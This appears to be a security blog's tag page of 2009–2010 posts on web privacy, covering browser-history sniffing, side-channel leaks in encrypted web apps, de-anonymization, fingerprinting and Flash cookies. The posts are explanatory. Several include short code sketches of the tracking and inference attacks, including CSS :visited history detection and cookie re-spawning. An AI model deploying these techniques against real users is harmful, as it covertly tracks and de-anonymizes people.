Entries Tagged "web privacy"

A Revised Taxonomy of Social Networking Data

Lately I’ve been reading about user security and privacy — control, really — on social networking sites. The issues are hard and the solutions harder, but I’m seeing a lot of confusion in even forming the questions. Social networking sites deal with several different types of user data, and it’s essential to separate them.

Below is my taxonomy of social networking data, which I first presented at the Internet Governance Forum meeting last November, and again — revised — at an OECD workshop on the role of Internet intermediaries in June.

  • Service data is the data you give to a social networking site in order to use it. Such data might include your legal name, your age, and your credit-card number.
  • Disclosed data is what you post on your own pages: blog entries, photographs, messages, comments, and so on.
  • Entrusted data is what you post on other people’s pages. It’s basically the same stuff as disclosed data, but the difference is that you don’t have control over the data once you post it — another user does.
  • Incidental data is what other people post about you: a paragraph about you that someone else writes, a picture of you that someone else takes and posts. Again, it’s basically the same stuff as disclosed data, but the difference is that you don’t have control over it, and you didn’t create it in the first place.
  • Behavioral data is data the site collects about your habits by recording what you do and who you do it with. It might include games you play, topics you write about, news articles you access (and what that says about your political leanings), and so on.
  • Derived data is data about you that is derived from all the other data. For example, if 80 percent of your friends self-identify as gay, you’re likely gay yourself.

There are other ways to look at user data. Some of it you give to the social networking site in confidence, expecting the site to safeguard the data. Some of it you publish openly and others use it to find you. And some of it you share only within an enumerated circle of other users. At the receiving end, social networking sites can monetize all of it: generally by selling targeted advertising.

Different social networking sites give users different rights for each data type. Some are always private, some can be made private, and some are always public. Some can be edited or deleted — I know one site that allows entrusted data to be edited or deleted within a 24-hour period — and some cannot. Some can be viewed and some cannot.

It’s also clear that users should have different rights with respect to each data type. We should be allowed to export, change, and delete disclosed data, even if the social networking sites don’t want us to. It’s less clear what rights we have for entrusted data — and far less clear for incidental data. If you post pictures from a party with me in them, can I demand you remove those pictures — or at least blur out my face? (Go look up the conviction of three Google executives in Italian court over a YouTube video.) And what about behavioral data? It’s frequently a critical part of a social networking site’s business model. We often don’t mind if a site uses it to target advertisements, but are less sanguine when it sells data to third parties.

As we continue our conversations about what sorts of fundamental rights people have with respect to their data, and more countries contemplate regulation on social networking sites and user data, it will be important to keep this taxonomy in mind. The sorts of things that would be suitable for one type of data might be completely unworkable and inappropriate for another.

This essay previously appeared in IEEE Security & Privacy.

Edited to add: this post has been translated into Portuguese.

Posted on August 10, 2010 at 6:51 AM

Detecting Browser History

Interesting research.

Main results:

[…]

  • We analyzed the results from over a quarter of a million people who ran our tests in the last few months, and found that we can detect browsing histories for over 76% of them. All major browsers allow their users’ history to be detected, but it seems that users of the more modern browsers such as Safari and Chrome are more affected; we detected visited sites for 82% of Safari users and 94% of Chrome users.

    […]

  • While our tests were quite limited, for our test of the 5,000 most popular websites, we detected an average of 63 visited locations (13 sites and 50 subpages on those sites); the medians were 8 and 17, respectively.
  • Almost 10% of our visitors had over 30 visited sites and 120 subpages detected — heavy Internet users who don’t protect themselves are more affected than others.

    […]

  • The ability to detect visitors’ browsing history requires just a few lines of code. Armed with a list of websites to check for, a malicious webmaster can scan over 25 thousand links per second (1.5 million links per minute) in almost every recent browser.
  • Most websites and pages you view in your browser can be detected as long as they are kept in your history. Almost every address that was in your browser’s address bar can be detected (this includes most pages, including those retrieved using https and some forms with potentially private information such as your zip code or search query). Pages won’t be detected when they expire from your history (usually after a month or two), or if you manually clear it.

For now, the only way to fix the issue is to constantly clear browsing history or use private browsing modes. The first browser to prevent this trick in a default installation (Firefox 4.0) is supposed to come out in October.
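
For readers wondering what those “few lines of code” look like, here is a minimal TypeScript sketch of the well-known CSS :visited leak that this line of research exploits, and that the Firefox 4.0 change mentioned above was designed to close. The URL list and styling are mine; this is an illustration of the technique, not the researchers’ actual test code, and it no longer works in browsers that shipped the fix.

```typescript
// Minimal sketch of the classic CSS :visited history-sniffing trick.
// The probed URLs are hypothetical; modern browsers deliberately lie about
// the computed style of :visited links, which breaks this check.
function detectVisited(urls: string[]): string[] {
  const style = document.createElement("style");
  // Give visited links a distinctive color we can query back.
  style.textContent = "a.probe:visited { color: rgb(1, 2, 3); }";
  document.head.appendChild(style);

  const visited: string[] = [];
  for (const url of urls) {
    const link = document.createElement("a");
    link.className = "probe";
    link.href = url;
    document.body.appendChild(link);
    // In affected browsers, getComputedStyle revealed whether the
    // :visited rule applied, i.e. whether the URL is in the history.
    if (getComputedStyle(link).color === "rgb(1, 2, 3)") {
      visited.push(url);
    }
    link.remove();
  }
  style.remove();
  return visited;
}

// Usage: scan a candidate list and report the hits.
console.log(detectVisited(["https://example.com/", "https://example.org/login"]));
```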

Here’s a link to the paper.

Posted on May 20, 2010 at 1:28 PM

Side-Channel Attacks on Encrypted Web Traffic

Nice paper: “Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow,” by Shuo Chen, Rui Wang, XiaoFeng Wang, and Kehuan Zhang.

Abstract. With software-as-a-service becoming mainstream, more and more applications are delivered to the client through the Web. Unlike a desktop application, a web application is split into browser-side and server-side components. A subset of the application’s internal information flows are inevitably exposed on the network. We show that despite encryption, such a side-channel information leak is a realistic and serious threat to user privacy. Specifically, we found that surprisingly detailed sensitive information is being leaked out from a number of high-profile, top-of-the-line web applications in healthcare, taxation, investment and web search: an eavesdropper can infer the illnesses/medications/surgeries of the user, her family income and investment secrets, despite HTTPS protection; a stranger on the street can glean enterprise employees’ web search queries, despite WPA/WPA2 Wi-Fi encryption. More importantly, the root causes of the problem are some fundamental characteristics of web applications: stateful communication, low entropy input for better interaction, and significant traffic distinctions. As a result, the scope of the problem seems industry-wide. We further present a concrete analysis to demonstrate the challenges of mitigating such a threat, which points to the necessity of a disciplined engineering practice for side-channel mitigations in future web application developments.

We already know that eavesdropping on an SSL-encrypted web session can leak a lot of information about the person’s browsing habits. Since the sizes of both the page requests and the page downloads vary from page to page, an eavesdropper can sometimes infer which links the person clicked on and what pages he’s viewing.

This paper extends that work. Ed Felten explains:

The new paper shows that this inference-from-size problem gets much, much worse when pages are using the now-standard AJAX programming methods, in which a web “page” is really a computer program that makes frequent requests to the server for information. With more requests to the server, there are many more opportunities for an eavesdropper to make inferences about what you’re doing — to the point that common applications leak a great deal of private information.

Consider a search engine that autocompletes search queries: when you start to type a query, the search engine gives you a list of suggested queries that start with whatever characters you have typed so far. When you type the first letter of your search query, the search engine page will send that character to the server, and the server will send back a list of suggested completions. Unfortunately, the size of that suggested completion list will depend on which character you typed, so an eavesdropper can use the size of the encrypted response to deduce which letter you typed. When you type the second letter of your query, another request will go to the server, and another encrypted reply will come back, which will again have a distinctive size, allowing the eavesdropper (who already knows the first character you typed) to deduce the second character; and so on. In the end the eavesdropper will know exactly which search query you typed. This attack worked against the Google, Yahoo, and Microsoft Bing search engines.

Many web apps that handle sensitive information seem to be susceptible to similar attacks. The researchers studied a major online tax preparation site (which they don’t name) and found that it leaks a fairly accurate estimate of your Adjusted Gross Income (AGI). This happens because the exact set of questions you have to answer, and the exact data tables used in tax preparation, will vary based on your AGI. To give one example, there is a particular interaction relating to a possible student loan interest calculation, that only happens if your AGI is between $115,000 and $145,000 — so that the presence or absence of the distinctively-sized message exchange relating to that calculation tells an eavesdropper whether your AGI is between $115,000 and $145,000. By assembling a set of clues like this, an eavesdropper can get a good fix on your AGI, plus information about your family status, and so on.

For similar reasons, a major online health site leaks information about which medications you are taking, and a major investment site leaks information about your investments.
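
Felten’s autocomplete example boils down to matching observed ciphertext sizes against a dictionary the attacker has built in advance by probing the search engine himself. Here is a toy TypeScript sketch of that matching step; the size table, alphabet, and numbers below are hypothetical.

```typescript
// prefix -> encrypted autocomplete-response size in bytes, built offline by
// the attacker typing every prefix himself and recording what he sees on the wire.
type SizeTable = Map<string, number>;

function inferQuery(observedSizes: number[], table: SizeTable): string {
  let prefix = "";
  for (const size of observedSizes) {
    // Which one-character extension of the current prefix produces an
    // autocomplete response of exactly this size?
    for (const ch of "abcdefghijklmnopqrstuvwxyz") {
      if (table.get(prefix + ch) === size) {
        prefix += ch;
        break;
      }
    }
  }
  return prefix;
}

// Example with a made-up table: observing responses of 512 then 498 bytes
// recovers the query "hi".
const table: SizeTable = new Map([["h", 512], ["ha", 505], ["hi", 498]]);
console.log(inferQuery([512, 498], table)); // "hi"
```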

The paper goes on to talk about mitigation — padding page requests and downloads to a constant size is the obvious one — but they’re difficult and potentially expensive.

More articles.

Posted on March 26, 2010 at 6:04 AM

De-Anonymizing Social Network Users

Interesting paper: “A Practical Attack to De-Anonymize Social Network Users.”

Abstract. Social networking sites such as Facebook, LinkedIn, and Xing have been reporting exponential growth rates. These sites have millions of registered users, and they are interesting from a security and privacy point of view because they store large amounts of sensitive personal user data.

In this paper, we introduce a novel de-anonymization attack that exploits group membership information that is available on social networking sites. More precisely, we show that information about the group memberships of a user (i.e., the groups of a social network to which a user belongs) is often sufficient to uniquely identify this user, or, at least, to significantly reduce the set of possible candidates. To determine the group membership of a user, we leverage well-known web browser history stealing attacks. Thus, whenever a social network user visits a malicious website, this website can launch our de-anonymization attack and learn the identity of its visitors.

The implications of our attack are manifold, since it requires a low effort and has the potential to affect millions of social networking users. We perform both a theoretical analysis and empirical measurements to demonstrate the feasibility of our attack against Xing, a medium-sized social network with more than eight million members that is mainly used for business relationships. Our analysis suggests that about 42% of the users that use groups can be uniquely identified, while for 90%, we can reduce the candidate set to less than 2,912 persons. Furthermore, we explored other, larger social networks and performed experiments that suggest that users of Facebook and LinkedIn are equally vulnerable (although attacks would require more resources on the side of the attacker). An analysis of an additional five social networks indicates that they are also prone to our attack.
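
Set aside the history-stealing step, and the core of the attack is just intersecting pre-crawled group member lists until few candidates remain. A toy sketch of that step (group names and user identifiers are hypothetical):

```typescript
// Group member lists are crawled in advance; the victim's group memberships
// come from a browser-history sniffing attack like the one described above.
function candidateUsers(
  victimGroups: string[],
  groupMembers: Map<string, Set<string>> // group id -> member ids
): Set<string> {
  let candidates: Set<string> | null = null;
  for (const g of victimGroups) {
    const members = groupMembers.get(g) ?? new Set<string>();
    candidates =
      candidates === null
        ? new Set(members)
        : new Set([...candidates].filter((u) => members.has(u)));
  }
  // A singleton set uniquely identifies the visitor; a small set still
  // narrows the candidates dramatically.
  return candidates ?? new Set<string>();
}

// Example: the victim's sniffed groups are "chess" and "infosec".
const members = new Map<string, Set<string>>([
  ["chess", new Set(["alice", "bob", "carol"])],
  ["infosec", new Set(["bob", "dave"])],
]);
console.log(candidateUsers(["chess", "infosec"], members)); // Set { "bob" }
```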

News article. Moral: anonymity is really, really hard — but we knew that already.

Posted on March 8, 2010 at 6:13 AM

Tracking your Browser Without Cookies

How unique is your browser? Can you be tracked simply by its characteristics? The EFF is trying to find out. Their site Panopticlick will measure the characteristics of your browser setup and tell you how unique it is.

I just ran the test on myself, and my browser is unique amongst the 120,000 browsers tested so far. It’s my browser plugin details; no one else has the exact configuration I do. My list of system fonts is almost unique; only one other person has the exact configuration I do. (This seems odd to me; I have a week-old Sony laptop running Windows 7, and I haven’t done anything with the fonts.)
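
For the curious, the basic idea behind such a fingerprint can be sketched in a few lines: concatenate a handful of browser attributes and hash the result into an identifier. This is only an illustration; the attribute list below is mine, not the EFF’s actual feature set, which is broader and also measures how much identifying information each attribute carries.

```typescript
// Minimal sketch of a passive browser fingerprint. Requires a secure context
// for crypto.subtle; the chosen attributes are illustrative.
async function browserFingerprint(): Promise<string> {
  const parts = [
    navigator.userAgent,
    navigator.language,
    `${screen.width}x${screen.height}x${screen.colorDepth}`,
    new Date().getTimezoneOffset().toString(),
    Array.from(navigator.plugins, (p) => p.name).join(","),
  ].join("|");
  // Hash the concatenated attributes into a stable identifier.
  const digest = await crypto.subtle.digest(
    "SHA-256",
    new TextEncoder().encode(parts)
  );
  return Array.from(new Uint8Array(digest), (b) =>
    b.toString(16).padStart(2, "0")
  ).join("");
}

// Usage: print this browser's fingerprint.
browserFingerprint().then((fp) => console.log(fp));
```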

EFF has some suggestions for self-defense, none of them very satisfactory. And here’s a news story.

EDITED TO ADD (1/29): There’s a lot in the comments leading me to question the accuracy of this test. I’ll post more when I know more.

EDITED TO ADD (2/12): Comments from one of the project developers.

Posted on January 29, 2010 at 7:06 AM

Helpful Hint for Fugitives: Don't Update Your Location on Facebook

Fugitive caught after updating his status on Facebook.

Investigators scoured social networking sites such as Facebook and MySpace but initially could find no trace of him and were unable to pin down his location in Mexico.

Several months later, a Secret Service agent, Seth Reeg, checked Facebook again and up popped Maxi Sopo. His photo showed him partying in front of a backdrop featuring logos of BMW and Courvoisier cognac, sporting a black jacket adorned with a not-so-subtle white lion.

Although Sopo’s profile was set to private, his list of friends was not. Scoville started combing through it and was surprised to see that one friend listed an affiliation with the justice department. He sent a message requesting a phone call.

“We figured this was a person we could probably trust to keep our inquiry discreet,” Scoville said.

Proving the 2.0 adage that a friend on Facebook is rarely a friend indeed, the former official said he had met Sopo in Cancun’s nightclubs a few times, but did not really know him and had no idea he was a fugitive. The official learned where Sopo was living and passed that information back to Scoville, who provided it to Mexican authorities. They arrested Sopo last month.

It’s easy to say “so dumb,” and it would be true, but what’s interesting is how people just don’t think through the privacy implications of putting their information on the Internet. Facebook is how we interact with friends, and we think of it in the frame of interacting with friends. We don’t think that our employers might be looking — they’re not our friends! — that the information will be around forever, or that it might be abused. Privacy isn’t salient; chatting with friends is.

Posted on October 19, 2009 at 7:55 AM

Predicting Characteristics of People by the Company they Keep

Turns out “gaydar” can be automated:

Using data from the social network Facebook, they made a striking discovery: just by looking at a person’s online friends, they could predict whether the person was gay. They did this with a software program that looked at the gender and sexuality of a person’s friends and, using statistical analysis, made a prediction. The two students had no way of checking all of their predictions, but based on their own knowledge outside the Facebook world, their computer program appeared quite accurate for men, they said. People may be effectively “outing” themselves just by the virtual company they keep.

This sort of thing can be generalized:

The work has not been published in a scientific journal, but it provides a provocative warning note about privacy. Discussions of privacy often focus on how to best keep things secret, whether it is making sure online financial transactions are secure from intruders, or telling people to think twice before opening their lives too widely on blogs or online profiles. But this work shows that people may reveal information about themselves in another way, and without knowing they are making it public. Who we are can be revealed by, and even defined by, who our friends are: if all your friends are over 45, you’re probably not a teenager; if they all belong to a particular religion, it’s a decent bet that you do, too. The ability to connect with other people who have something in common is part of the power of social networks, but also a possible pitfall. If our friends reveal who we are, that challenges a conception of privacy built on the notion that there are things we tell, and things we don’t.
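
The inference itself is simple enough to sketch: estimate an undisclosed attribute from the fraction of friends who disclose it. The toy version below uses a bare threshold; the students’ actual statistical model was presumably more sophisticated, and the threshold here is arbitrary.

```typescript
// Toy illustration of inferring an attribute from the company someone keeps:
// predict "yes" when enough friends openly disclose the attribute themselves.
function predictAttribute(
  friendDiscloses: boolean[], // true if that friend discloses the attribute
  threshold = 0.8 // arbitrary cutoff for this sketch
): boolean {
  if (friendDiscloses.length === 0) return false;
  const fraction =
    friendDiscloses.filter(Boolean).length / friendDiscloses.length;
  return fraction >= threshold;
}

// Example: four of five friends disclose the attribute, so we predict it.
console.log(predictAttribute([true, true, true, false, true])); // true
```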

EDITED TO ADD (9/29): Better information from the MIT Newspaper.

Posted on September 29, 2009 at 7:13 AM

Sears Spies on its Customers

It’s not just hackers who steal financial and medical information:

Between April 2007 and January 2008, visitors to the Kmart and Sears web sites were invited to join an “online community” for which they would be paid $10 with the idea they would be helping the company learn more about their customers. It turned out they learned a lot more than participants realized or that the feds thought was reasonable.

To join the “My SHC Community,” users downloaded software that ended up grabbing some members’ prescription information, emails, bank account data and purchases on other sites.

Reminds me of the 2005 Sony rootkit, which — oddly enough — is in the news again too:

After purchasing an Anastacia CD, the plaintiff played it in his computer but his anti-virus software set off an alert saying the disc was infected with a rootkit. He went on to test the CD on three other computers. As a result, the plaintiff ended up losing valuable data.

Claiming for his losses, the plaintiff demanded 200 euros for 20 hours wasted dealing with the virus alerts and another 100 euros for 10 hours spent restoring lost data. Since the plaintiff was self-employed, he also claimed for loss of profits and in addition claimed 800 euros which he paid to a computer expert to repair his network after the infection. Added to this was 185 euros in legal costs making a total claim of around 1,500 euros.

The judge’s assessment was that the CD sold to the plaintiff was faulty, since he should be able to expect that the CD could play on his system without interfering with it.

The court ordered the retailer of the CD to pay damages of 1,200 euros.

Posted on September 24, 2009 at 6:37 AM

Flash Cookies

Flash has the equivalent of cookies, and they’re hard to delete:

Unlike traditional browser cookies, Flash cookies are relatively unknown to web users, and they are not controlled through the cookie privacy controls in a browser. That means even if a user thinks they have cleared their computer of tracking objects, they most likely have not.

What’s even sneakier?

Several services even use the surreptitious data storage to reinstate traditional cookies that a user deleted, which is called ‘re-spawning’ in homage to video games where zombies come back to life even after being “killed,” the report found. So even if a user gets rid of a website’s tracking cookie, that cookie’s unique ID will be assigned back to a new cookie again using the Flash data as the “backup.”
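
The re-spawning logic is trivial, which is part of what makes it troubling. Here is a conceptual sketch with an in-memory map standing in for the Flash SharedObject bridge; all names are illustrative, not any vendor’s actual code.

```typescript
// Stand-in for the Flash local shared object; a real tracker would go through
// the ActionScript SharedObject bridge instead of an in-memory map.
const flashLSO = new Map<string, string>();

function readCookie(name: string): string | null {
  const match = document.cookie.match(new RegExp(`(?:^|; )${name}=([^;]*)`));
  return match ? decodeURIComponent(match[1]) : null;
}

function respawnTrackingId(name: string): void {
  const cookieId = readCookie(name);
  const flashId = flashLSO.get(name) ?? null;
  if (!cookieId && flashId) {
    // The user deleted the HTTP cookie, but the Flash copy survived:
    // silently reassign the same unique ID to a fresh cookie.
    document.cookie = `${name}=${encodeURIComponent(flashId)}; max-age=31536000`;
  } else if (cookieId && !flashId) {
    // Keep a backup on the Flash side so the ID outlives cookie clearing.
    flashLSO.set(name, cookieId);
  }
}
```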

Posted on August 17, 2009 at 6:36 AM
